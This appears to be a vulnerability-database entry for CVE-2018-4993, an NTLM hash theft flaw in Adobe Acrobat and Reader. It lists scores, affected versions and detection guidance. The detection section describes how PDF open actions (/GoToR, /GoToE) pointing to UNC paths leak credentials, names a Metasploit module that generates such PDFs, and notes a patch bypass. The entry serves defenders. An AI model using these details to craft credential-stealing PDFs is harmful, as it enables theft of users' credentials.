cbcvebase.
CVE-2018-4993
published 2018-07-09

CVE-2018-4993: Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft…

PriorityP268high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
86.52%
99.7th percentile
Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft vulnerability. Successful exploitation could lead to information disclosure.

Affected

7 ranges
VendorProductVersion rangeFixed in
adobeacrobat_dc15.006.30060 – 15.006.30417
adobeacrobat_dc15.008.20082 – 18.011.20038
adobeacrobat_dc17.011.30059 – 17.011.30079
adobeacrobat_reader_dc15.006.30060 – 15.006.30417
adobeacrobat_reader_dc15.008.20082 – 18.011.20038
adobeacrobat_reader_dc17.011.30059 – 17.011.30079
pdf-xchangepdf-xchange_editor< 8.0.330.08.0.330.0

Detection & IOCsextracted from sources · hover to see the quote

command/S /GoToR
  • Look for PDF files containing /AA (Additional Actions) dictionary entries with /O (page open) actions using /S /GoToR or /S /GoToE action types pointing to UNC (\\server\share) paths in the /F field — this triggers automatic NTLM credential leakage to an attacker-controlled SMB server.
  • The incomplete May 2018 patch (APSB18-09) only fixed GoToR action type; malicious PDFs exploiting the unpatched GoToE (GoToEmbedded) action type bypass the fix and were observed in the wild submitted to VirusTotal in May 2018.
  • The Metasploit module 'auxiliary/fileformat/badpdf' generates malicious PDFs embedding a UNC link for NetNTLM credential capture; hunt for PDF files created by or matching the structure of this module.
  • ·Both GoToR (GoToRemote) and GoToE (GoToEmbedded) action types are vulnerable; the May 2018 patch (APSB18-09) only addressed GoToR. Detections must cover both /S /GoToR and /S /GoToE in PDF /AA dictionaries to avoid missing the bypass variant (CVE-2018-15979).
  • ·All Windows PDF viewers are affected, not just Adobe products — scope detection and blocking rules to cover any PDF reader process initiating SMB connections.

CVSS provenance

nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
ghsa6.1MEDIUM
vendor_redhat6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.